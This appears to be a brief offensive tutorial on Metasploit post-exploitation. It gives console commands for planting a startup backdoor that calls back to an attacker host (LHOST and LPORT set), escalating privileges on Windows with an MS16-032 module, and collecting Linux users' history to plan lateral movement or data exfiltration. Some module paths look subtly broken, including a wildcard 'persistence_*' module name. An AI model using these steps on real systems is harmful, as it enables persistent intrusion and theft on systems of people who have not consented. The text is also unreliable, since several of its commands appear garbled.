Leveraging Metasploit Modules for Maintaining Access
Maintaining Persistent Access
To maintain persistent access to the compromised system, Metasploit offers various modules that can be used to establish a reliable and long-lasting connection. One of the most commonly used modules is the post/windows/manage/persistence_*
module, which allows the attacker to create a backdoor that will automatically run on system startup.
sequenceDiagram
participant Attacker
participant Target
Attacker->>Target: Initial Exploitation
Target->>Attacker: Compromised System
Attacker->>Target: Persistence Module Execution
Target->>Attacker: Persistent Access Established
Persistence Module Example
- Launch the Metasploit console on the attacker's Ubuntu 22.04 system:
msfconsole
- Use the persistence module:
use post/windows/manage/persistence_*
- Set the required options, such as the
LHOST
(attacker's IP address) and LPORT
(listening port):set LHOST 192.168.1.100
set LPORT 4444
- Run the module to establish persistent access on the target system:
run
Privilege Escalation
Gaining elevated privileges on the compromised system is crucial for further exploitation and information gathering. Metasploit provides various modules to assist with privilege escalation, such as post/windows/escalate/*
and post/linux/escalate/*
.
Privilege Escalation Example (Windows)
- Use the
post/windows/escalate/ms16_032_secondary_logon_handle_privesc
module:use post/windows/escalate/ms16_032_secondary_logon_handle_privesc
- Set the required options, such as the
SESSION
number:set SESSION 1
- Run the module to attempt privilege escalation:
run
Metasploit's post-exploitation modules can be used to gather valuable information about the compromised system, such as user accounts, network configurations, and running processes. This information can be used to further expand the attacker's access and control over the target system.
- Use the
post/linux/gather/enum_users_history
module:use post/linux/gather/enum_users_history
- Set the required options, such as the
SESSION
number:set SESSION 1
- Run the module to gather user history information:
run
The information gathered through these post-exploitation modules can be used to plan the next steps in the attack, such as lateral movement or data exfiltration.